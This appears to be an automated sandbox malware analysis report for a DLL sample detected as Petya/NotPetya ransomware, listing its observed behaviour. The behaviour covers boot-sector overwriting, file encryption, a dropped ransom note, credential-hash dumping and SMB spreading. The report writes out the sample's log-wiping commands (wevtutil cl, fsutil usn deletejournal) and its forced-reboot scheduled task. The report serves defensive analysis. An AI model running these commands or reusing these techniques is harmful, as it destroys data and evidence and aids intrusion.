Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:309071
Start time:22:05:09
Joe Sandbox Product:Cloud
Start date:12.07.2017
Overall analysis duration:0h 10m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:abc.dll
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
Detection:MAL
Classification:mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 90
  • Number of non-executed functions: 56
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Sleeps bigger than 20 are automatically reduced to 1
  • Sleeps bigger than 20 are automatically reduced to 1
  • Found application associated with file extension: .dll
Warnings:
Show All
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Collider Navigation

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook



Signature Overview

Click to jump to signature section


Operating System Destruction:

barindex
Contains functionality to access PhysicalDrive, possible boot sector overwriteShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E8CBF CreateFileA on filename \\.\PhysicalDrive01_2_011E8CBF

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree,1_2_011E1BA0
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1E51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,LocalFree,1_2_011E1E51
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1424 CryptAcquireContextA,GetLastError,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,1_2_011E1424
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E189A StrStrIW,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,1_2_011E189A
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1C7F CryptExportKey,CryptExportKey,LocalAlloc,CryptExportKey,CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,LocalFree,1_2_011E1C7F
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1B4E CryptGenKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,1_2_011E1B4E

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree,1_2_011E1BA0
Clears the journal logShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknownProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Clears the windows event logShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Writes a notice file (html or txt) to demand a ransomShow sources
Source: C:\Windows\System32\rundll32.exeFile dropped: C:\README.TXT -> decryption service.we guarantee that you can recover all your files safely and easily.all you need to do is submit the payment and purchase the decryption key.please follow the instructions:1.send $300 worth of bitcoin to following address:1mz7153hmuxxtur2r1t78mgsdzaatnbbwx2.send your bitcoin wallet id and personal installation key to e-mail wowsmith123456@posteo.net.your personal installation key:aqiaaa5maaaapaaa++tyrumu+pfr/pqcpalhiajbcixd9om3nuqcxjh6gytiieggdriojyg0vc3ymlm0vm6dnuflp+ctfnhgemd286p6c9ooj4wewgzdnu+wphrgkgpuu75f2gqvetpqbyvpofidq0lfuixrlh9p/l7j2eox+b37pkl9gajy9ft9r7kxavoqvxni68rj7dmyrfytyy2amm10uvp8astgukmm0atzd7puxmbjenkjo/b3xomooqjxgevmikux9eacs2hhfjqata0pkd+/p8onhb4lllk1zyqudtralmi0s+ci4+yh+f3h0bzzwv0bd/dsk83/sjelc+iprfxtm6kcvqnfpa==
Petya / NotPetya detected (based on Eternalblue SMBv1 Shellcode pattern)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E3CA01_2_011E3CA0

Exploits:

barindex
Contains functionality to create an SMB headerShow sources
Source: C:\Windows\System32\rundll32.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_011E2466
Connects to many different private IPs (likely to spread or exploit)Show sources
Source: global trafficTCP traffic: 192.168.1.16:445
Source: global trafficTCP traffic: 192.168.1.1:139
Source: global trafficTCP traffic: 192.168.1.0:139
Source: global trafficTCP traffic: 192.168.1.2:80
Source: global trafficTCP traffic: 192.168.1.13:445
Connects to many different private IPs via SMB (likely to spread or exploit)Show sources
Source: global trafficTCP traffic: 192.168.1.16:445
Source: global trafficTCP traffic: 192.168.1.1:139
Source: global trafficTCP traffic: 192.168.1.0:139
Source: global trafficTCP traffic: 192.168.1.2:445
Source: global trafficTCP traffic: 192.168.1.13:445

Networking:

barindex
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E67AF memset,select,recv,htons,recv,1_2_011E67AF
Urls found in memory or binary dataShow sources
Source: rundll32.exeString found in binary or memory: http://192.168.1.2/7

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\System32\rundll32.exeCode function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive1_2_011E1038
Source: C:\Windows\System32\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive01_2_011E8CBF
Infects the boot sector of the hard diskShow sources
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11

Stealing of Sensitive Information:

barindex
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\Windows\System32\rundll32.exeDirectory queried: number of queries: 1011
Contains functionality to dump credential hashes (LSA Dump)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_2_00F62143
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_1_00F62143

Persistence and Installation Behavior:

barindex
Creates license or readme fileShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\README.TXT
Drops PE filesShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\dllhost.dat
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\dllhost.dat
May use bcdedit to modify the Windows boot settingsShow sources
Source: loaddll32.exeBinary or memory string: 03<bcdedit.exe`
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\System32\rundll32.exeCode function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive1_2_011E1038
Source: C:\Windows\System32\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive01_2_011E8CBF
Infects the boot sector of the hard diskShow sources
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Writes directly to the primary disk partition (DR0)Show sources
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,1_2_011E9367
Generates new code (likely due to unpacking of malware or shellcode)Show sources
Source: C:\Windows\System32\rundll32.exeCode execution: Found new code
PE file contains an invalid checksumShow sources
Source: F915.tmp.2724.drStatic PE information: real checksum: 0x18550 should be: 0x23f50
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F65955 push ecx; ret 5_2_00F65968
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F65955 push ecx; ret 5_1_00F65968
Contains functionality to check for running processes (XOR)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_011E8677

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_011E1973
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file systemShow sources
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\Windows\System32\rundll32.exeDirectory queried: number of queries: 1011
Contains functionality to enumerate network shares of other devicesShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$1_2_011E9987
Contains functionality to spread via wmic.exeShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E98AB GetSystemDirectoryW,PathAppendW,PathFileExistsW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,GetLastError,1_2_011E98AB

System Summary:

barindex
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: abc.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: wdigest.pdb source: F915.tmp
Source: Binary string: wdigest.pdbJ6 source: F915.tmp
Binary contains paths to development resourcesShow sources
Source: rundll32.exe, abc.dllBinary or memory string: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQABC:\Windows;.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.%ws.*...Microsoft Enhanced RSA and AES Cryptographic ProviderREADME.TXTQ
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E81BA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,1_2_011E81BA
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E8677 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_011E8677
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E85D0 LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,1_2_011E85D0
Creates temporary filesShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
PE file has an executable .text section and no other executable sectionShow sources
Source: abc.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policiesShow sources
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Runs a DLL by calling functionsShow sources
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\abc.dll'
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknownProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: unknownProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\schtasks.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: abc.dllStatic PE information: Section: .rsrc ZLIB complexity 0.999495577221
Contains functionality to call native functionsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree,5_2_00F618D9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,5_2_00F61D5F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree,5_1_00F618D9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,5_1_00F61D5F
Contains functionality to communicate with device driversShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E8D5A: CreateFileA,DeviceIoControl,LocalAlloc,SetFilePointer,WriteFile,LocalFree,CloseHandle,1_2_011E8D5A
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,1_2_011E9987
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\abc
Enables security privilegesShow sources
Source: C:\Windows\System32\wevtutil.exeProcess token adjusted: Security
PE file contains executable resources (Code or Archives)Show sources
Source: dllhost.dat.2724.drStatic PE information: Resource name: BINRES type: ump; PE32 executable for MS Windows (console) Intel 80386 32-bit
PE file has an invalid certificateShow sources
Source: abc.dllStatic PE information: invalid certificate
Reads the hosts fileShow sources
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Contains functionality to create processes via WMIShow sources
